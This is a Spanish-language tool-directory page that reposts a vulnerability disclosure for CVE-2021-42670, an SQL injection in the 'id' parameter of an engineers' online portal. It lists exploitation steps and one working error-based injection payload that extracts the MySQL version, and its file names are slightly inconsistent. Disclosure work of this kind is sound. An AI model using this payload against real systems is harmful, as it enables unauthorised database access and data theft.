Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-42670 — CVE-2021-42670 - Vulnerabilidad de inyección SQL en el sistema de portal en línea de ingenieros. | Kitploit
Herramientas/GitHubGitHub/0xdeku/cve-2021-42670
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónSeguridad de Bases de Datos
GitHub0xdeku/cve-2021-42670

CVE-2021-42670

CVE-2021-42670 - Vulnerabilidad de inyección SQL en el sistema de portal en línea de ingenieros.

Ver Repositorio
21hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2021-42670

CVE-2021-42670 - Vulnerabilidad de SQL Injection en el sistema de portal en línea de Engineers.

Descripción técnica:

Existe una vulnerabilidad de SQL Injection en el Portal en línea de Engineers. Un atacante puede aprovechar el parámetro vulnerable "id" en la página web "announcements_student.php" para manipular la consulta SQL realizada. Como resultado, el atacante puede extraer datos sensibles del servidor web.

Componentes afectados -

Página vulnerable - announcements_student.php

Parámetro vulnerable - "id"

Pasos para explotar:

  1. Navegue a http://localhost/nia_munoz_monitoring_system/announcements_students.php
  2. Inserte su payload en el parámetro id

Prueba de concepto (Poc) -

El siguiente payload le permitirá extraer la versión del servidor MySql que se ejecuta en el servidor web -

root@kitploit:~
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

CVE-2021-42670

Referencias -

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670

https://nvd.nist.gov/vuln/detail/CVE-2021-42670

Descubierto por -

Alon Leviev(0xDeku), 22 de octubre de 2021.

Descargar herramienta